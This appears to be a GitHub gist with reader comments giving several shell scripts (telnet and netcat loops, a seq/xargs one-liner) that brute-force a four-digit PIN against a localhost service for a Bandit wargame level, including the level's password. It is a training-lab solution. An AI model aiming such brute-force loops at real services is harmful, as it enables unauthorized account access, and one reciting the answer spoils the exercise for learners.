-
-
Save vinzdef/7bdf4249e67a2ff7ed3f to your computer and use it in GitHub Desktop.
| for x in {0..9}{0..9}{0..9}{0..9}; do | |
| echo UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $x | telnet localhost 30002 | egrep -v "Exiting|Wrong|I am"; | |
| echo "Try $x"; | |
| done |
#! /bin/bash
counter=0
rm /tmp/res
for i in {0..9}{0..9}{0..9}{0..9}; do
(( counter++ ))
if(( counter > 1000 )); then
#takes the brute force attemps we've writen to file and pipelines it to netcat (can only handle about 1000 lines at a time)
#then it will take the output and appends to the file res
echo "sending 1000 attempts to nc and writing to /tmp/res"
cat /tmp/tmpFile | nc localhost 30002 >>/tmp/res
#breaks loop once it find the password and will print outside the loop
if (cat /tmp/res | grep "The password of user bandit25 is");then
break
fi
#write over the existing tmpFile and reset counter to another thousand
echo "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i" > /tmp/tmpFile
let counter=0
echo "$counter"
else
#writes all brute-force attemps to /tmp/tmpFile until it reachs 1000
echo "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i" >> /tmp/tmpFile
fi
done
#Our answer
echo cat /tmp/res | grep "The password of user bandit25 is"
i generated a file with all possible combinations with this script:
#!/bin/bash
passwd="UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ"
for a in {0..9}{0..9}{0..9}{0..9}
do
echo $passwd' '$a >> combinations.txt
done
then run a simple command that sends over a single nc connection all possible combinations, which is quite faster than everything i've seen here (and even simplier i guess?).
cat combinations.txt | nc localhost 30002 >> result.txt
you can easily find the only different line (so the one containing the psw) using
sort result.txt | uniq -u
oneliner: for i in {0000..9999}; do echo "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i" | nc localhost 30002 | grep -v "I am the pincode" | grep -v "Exiting." | grep -v "Wrong"; done
seq -f %04g 10000 | xargs printf "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ %s\n" | nc localhost 30002 | grep bandit25
Fieel's answer is by far the best.
I combined all of the steps into a single script with 2 second sleeps between the major steps and I got the password much faster than some of the other solutions. It is interesting that netcat can handle so many attempts at once. It's almost like it was designed for brute forcing...
I guess I could have actually made the txt files from inside the script and made them writable as well to improve on the script.
for a in {0..9}{0..9}{0..9}{0..9}; do
echo $passwd' '$a >> combinations.txt
done
sleep 2.0
cat combinations.txt | nc localhost 30002 >> result.txt
sleep 2.0
sort result.txt | uniq -u
Hi! Great job with this. I noticed it was a tad slow as a brute force attack, so i switched the
ncto betelnetand it went WAY faster. Seeing as how people who are stuck on this level may come here seeking help, would you mind making the small update?